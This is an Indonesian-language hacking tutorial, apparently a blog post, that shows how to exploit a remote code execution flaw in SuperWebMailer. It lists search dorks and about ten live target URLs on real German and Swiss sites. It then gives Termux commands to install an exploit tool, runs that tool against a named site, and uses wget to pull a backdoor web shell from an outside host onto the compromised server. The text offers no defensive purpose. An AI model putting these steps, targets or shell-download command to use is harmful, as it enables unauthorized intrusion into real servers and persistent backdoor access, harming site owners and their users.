-
Hai sobat.
Saya ikal
Disini saya akan share exploitasi yang berhubungan dengan remote code execution (RCE)
-
Jadi, Langsung saja
Bahan :
- Dork: inurl:/show_na.php?
intext:powered by SuperWebMailer
inurl:/browser.php?key=twitter
inurl:/browser.php?key=01
inurl:/browser.php?key=02
Note : selebihnya kembangin sendiri
- Termux : bisa download di playstore
- uploader & Shell backdoor : http://flickr.com.laptoptuanminh.com/gasno.php
- Tools exploiter
- Live target:
https://www.messerli.ch/mailer_/app_swm/
https://die-liebenden.org/wp-content/swm/
https://www.pyd.de/swm/
https://news.bbk-falkenstein.de/
https://news.tap.de/
https://newsletter.determann-touristik.de/
https://newsletter.kreis-borken.de/
https://www.erlebnistage.net/superwebmailer/
http://ruka-hw.de/smmb/
https://www.schmuckclub.de/newsletter-swm/
1. Tahap instalasi tools
Jika sudah mendownload atau memiliki termux, langkah selanjutnya adalah ketik perintah berikut ini :
$apt update && apt upgrade && pkg install python git$git clone https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer && cd RCE_SuperWebMailer
Nah itu perintah untuk installasi tools exploitnya.
Jika tools sudah terinstall, lanjut kalian ngedork dan mencari target. Atau jika klian malas ngedorking, kalian Bisa gunakan live target diatas.
2. Tahap eksekusi.
Jika sudah ada target, lanjut ke tahap eksekusi.
Kalian balik ke termux dan ketikan perintah ini
$python exploit.py -u https://lon-te.online/[path SWM]/
Contoh
$python exploit.py -uhttps://www.schmuckclub.de/newsletter-swm/
Penampakan jika target kalian vuln adalah seperti gambar diatas, akan muncul id dan uname target kalian.
Selanjutnya kalian tinggal spawn shell menggunakan command wget
contoh :
wget http://flickr.com.laptoptuanminh.com/gasno.php -O vy.php
Maka file akan tersimpan di path swm dengan nama vy.php kalian tinggal akses saja shell backdoor kalian. Selanjutnya itu seterah kalian mau di apakan.
Referensi :
https://youtu.be/mymqOBSRZmk
https://youtu.be/mymqOBSRZmk
Gre3tz : Mr.TenAr
Thanks
See u